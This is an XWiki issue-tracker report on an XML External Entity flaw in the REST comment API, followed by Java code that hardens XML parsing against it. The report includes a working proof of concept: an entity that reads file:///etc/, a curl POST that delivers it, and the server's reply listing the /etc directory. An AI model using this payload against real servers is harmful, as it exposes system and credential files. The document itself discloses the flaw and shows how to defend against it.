XWiki Platform / XWIKI-7711

Arbitrary file read access by registered users using REST interface.


Details

    • Bug
    • Resolution: Fixed
    • Major
    • 4.1-milestone-2, 4.0.1
    • 4.0-rc-1
    • REST
    • None
    • Unknown
    • n/a

    Description

      from an email I got:

      The XWiki REST API is vulnerable to an XML External Entity attack. This
      vulnerability allows, at a minimum, reading any file and directory accessible
      to the user running the application. The following PoC will create a
      comment including a listing of the '/etc/' directory.
      
      * XML document (com.xml):
      
      <!DOCTYPE comment [
      <!ENTITY bingo SYSTEM "file:///etc/">
      ]>
      <comment xmlns="http://www.xwiki.org">
          <text>This is a comment. Nothing fancy but -- &bingo; -- ...</text>
      </comment>
      
      * Call to the REST API:
      
      curl -u XXX:XXX -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://XXX/xwiki/rest/wikis/XXX/spaces/XXX/pages/XXX/comments"
      
      Regards,
      Nicolas Grégoire
      

      repeated:

      user@debo8:~$ curl -u user:passwd -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
      <?xml version="1.0" encoding="UTF-8" standalone="yes"?><comment xmlns="http://www.xwiki.org"><link rel="http://www.xwiki.org/rel/page" href="http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome"/><id>2</id><author>XWiki.user</author><date>2012-04-11T20:46:59.040-04:00</date><text>This is a comment. Nothing fancy but -- .java
      .pwd.lock
      acpi
      adduser.conf
      adjtime
      aliases
      alsa
      alternatives
      anacrontab
      apache2
      apm
      apt
      asound.names
      asound.state
      at.deny
      avahi
      bash_completion
      bash_completion.d
      bash.bashrc
      bindresvport.blacklist
      blkid.tab
      blkid.tab.old
      bluetooth
      bonobo-activation
      ca-certificates
      ca-certificates.conf
      ca-certificates.conf.dpkg-old
      calendar
      chatscripts
      chromium
      chromium-browser
      clutter-imcontext
      colord.conf
      compizconfig
      console
      ConsoleKit
      console-tools
      cron.d
      cron.daily
      cron.hourly
      cron.monthly
      cron.weekly
      crontab
      crypttab
      cups
      dbus-1
      debconf.conf
      debian_version
      default
      defoma
      deluser.conf
      dfs
      dhcp
      dhcp3
      dictionaries-common
      dkms
      dm
      dnsmasq.conf
      dnsmasq.conf.dpkg-old
      dnsmasq.d
      doc-base
      dpkg
      dumpasn1
      emacs
      email-addresses
      environment
      esound
      ethertypes
      exim4
      exports
      fam.conf
      festival.scm
      fonts
      foomatic
      fop.conf.d
      fstab
      fstab.d
      fuse.conf
      gai.conf
      gconf
      gdb
      gdm
      ghostscript
      gimp
      gnashpluginrc
      gnashrc
      gnome
      gnome-system-tools
      gnome-vfs-2.0
      gnome-vfs-mime-magic
      gre.d
      groff
      groovy
      group
      group-
      grub.d
      gshadow
      gshadow-
      gssapi_mech.conf
      gtk-2.0
      gtk-3.0
      gtkmathview
      hal
      hddtemp.db
      hdparm.conf
      hesiod.conf
      host.conf
      hostname
      hosts
      hosts.allow
      hosts.deny
      hp
      icedove
      icedtea-web
      iceweasel
      idmapd.conf
      ImageMagick
      inetd.conf
      init.d
      initramfs-tools
      inittab
      inputrc
      insserv
      insserv.conf
      insserv.conf.d
      iproute2
      irssi.conf
      issue
      issue.net
      java
      java-6-cacao
      java-6-openjdk
      java-6-sun
      javascript-common
      john
      kde3
      kernel
      kernel-img.conf
      kerneloops.conf
      kernel-pkg.conf
      keys
      kvm
      labrea
      ld.so.cache
      ld.so.conf
      ld.so.conf.d
      ldap
      libao.conf
      libaudit.conf
      libgda-3.0
      libpaper.d
      libreoffice
      libvirt
      lighttpd
      locale.alias
      locale.gen
      localtime
      logcheck
      login.defs
      logrotate.conf
      logrotate.d
      lsb-base
      lvm
      lynx-cur
      magic
      magic.mime
      mail.rc
      mailcap
      mailcap.order
      mailname
      manpath.config
      maven2
      menu
      menu-methods
      mercurial
      mime.types
      mke2fs.conf
      modprobe.d
      modules
      mono
      motd
      motd.tail
      mplayer
      mtab
      mtools.conf
      Muttrc
      Muttrc.d
      mysql
      nanorc
      netconfig
      netscsid.conf
      network
      NetworkManager
      networks
      nsswitch.conf
      obex-data-server
      openal
      OpenCL
      openoffice
      openvpn
      opt
      oss.conf
      pam.conf
      pam.d
      pango
      papersize
      passwd
      passwd-
      perl
      pm
      pnm2ppa.conf
      polipo
      polkit-1
      postgresql
      postgresql-common
      ppp
      prelink.conf
      profile
      profile.d
      protocols
      pulse
      purple
      python
      python2.5
      python2.6
      python2.7
      qemu-ifup
      rc.local
      rc0.d
      rc1.d
      rc2.d
      rc3.d
      rc4.d
      rc5.d
      rc6.d
      rcS.d
      rearj.cfg
      reportbug.conf
      resolv.conf
      resolvconf
      rmt
      rpc
      rsyslog.conf
      rsyslog.d
      samba
      sane.d
      sasl2
      screenrc
      securetty
      security
      selinux
      sensors.conf
      sensors.d
      sensors3.conf
      services
      sgml
      shadow
      shadow-
      shells
      skel
      smartd.conf
      smartmontools
      smi.conf
      snmp
      sound
      speech-dispatcher
      ssh
      ssl
      subversion
      sudoers
      sudoers.d
      sudoers.dpkg-dist
      sysconfig
      sysctl.conf
      sysctl.conf.dpkg-old
      sysctl.d
      systemd
      terminfo
      texmf
      timezone
      timidity
      tomcat5.5
      tor
      ts.conf
      tsocks.conf
      ucf.conf
      udev
      ufw
      updatedb.conf
      update-notifier
      UPower
      vde2
      velocity
      vga
      vim
      vpnc
      w3m
      wgetrc
      wildmidi
      wireshark
      wodim.conf
      wpa_supplicant
      X11
      xchat-systray
      xdg
      xen
      xml
      zfs
       -- ...</text><replyTo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:nil="true"/></comment>user@debo8:~$ 
      

      Not repeatable with guest user even if guest is allowed to comment.

      user@debo8:~$ curl -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
      Error number 9001 in 9: Access denied in edit mode on document xwiki:Main.WebHomeuser@debo8:~$
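The root cause is that the REST comment body is handed to an XML parser that still honours DOCTYPE declarations and resolves external entities. The usual remedy on the JVM is to configure JAXP so that a DOCTYPE is rejected outright (and, as defence in depth, external entities and external DTDs are never loaded), and to feed JAXB an already-hardened StAX reader rather than a raw input stream. The following is an added example illustrating that configuration against the PoC document from the report; it is not XWiki's own fix, and the class and method names (`CommentXmlHardening`, `commentText`, `hardenedStaxReader`) are hypothetical. It assumes only the JDK's built-in JAXP parsers (Xerces-based DOM and SJSXP StAX), which support the feature and property names used.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

/** Hardened parsing of a REST comment body. Example code, not XWiki's actual fix. */
public class CommentXmlHardening {

    /** The PoC document from the report (com.xml): an external entity pointing at /etc/. */
    static final String POC =
        "<!DOCTYPE comment [\n"
      + "<!ENTITY bingo SYSTEM \"file:///etc/\">\n"
      + "]>\n"
      + "<comment xmlns=\"http://www.xwiki.org\">\n"
      + "    <text>This is a comment. Nothing fancy but -- &bingo; -- ...</text>\n"
      + "</comment>";

    /** Constructed benign body, as a legitimate client would send: no DOCTYPE at all. */
    static final String BENIGN =
        "<comment xmlns=\"http://www.xwiki.org\"><text>Nothing fancy</text></comment>";

    /** DOM factory that refuses any DOCTYPE, so no entity (internal or external) can be declared. */
    static DocumentBuilderFactory hardenedDomFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true); // needed for getElementsByTagNameNS below
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that ignore the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Returns the comment text, or throws before any entity could be resolved. */
    static String commentText(String xml)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilder b = hardenedDomFactory().newDocumentBuilder();
        Document d = b.parse(new InputSource(new StringReader(xml)));
        return d.getElementsByTagNameNS("http://www.xwiki.org", "text").item(0).getTextContent();
    }

    /**
     * StAX reader with DTD support switched off. This is what to pass to a JAXB
     * Unmarshaller (unmarshaller.unmarshal(XMLStreamReader)) instead of a raw
     * InputStream, so that the unmarshaller never sees a DOCTYPE.
     */
    static XMLStreamReader hardenedStaxReader(String xml) throws XMLStreamException {
        XMLInputFactory xif = XMLInputFactory.newFactory();
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return xif.createXMLStreamReader(new StringReader(xml));
    }

    public static void main(String[] args) throws Exception {
        System.out.println("benign: " + commentText(BENIGN));
        try {
            commentText(POC);
            System.out.println("FAILED: PoC was accepted");
        } catch (SAXException e) {
            // Expected: the DOCTYPE is rejected, so file:///etc/ is never opened.
            System.out.println("rejected by DOM: " + e.getMessage());
        }
        try {
            // Drain the reader as an unmarshaller would; with DTD support off the document
            // fails (disallowed DOCTYPE or undeclared entity, depending on the implementation).
            XMLStreamReader r = hardenedStaxReader(POC);
            while (r.hasNext()) {
                r.next();
            }
            System.out.println("FAILED: StAX accepted PoC");
        } catch (XMLStreamException e) {
            System.out.println("rejected by StAX: " + e.getMessage());
        }
    }
}
```

The important property of both paths is that the request is rejected while the DOCTYPE is being scanned, before the parser reaches the entity reference, so the server never opens the referenced path. A quick server-side check for the same class of issue is to post a body that declares an entity pointing at a non-existent local path and confirm the API returns a parse error rather than a 2xx with an empty or expanded substitution.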
      
      
      

            People

              Assignee: CalebJamesDeLisle
              Reporter: CalebJamesDeLisle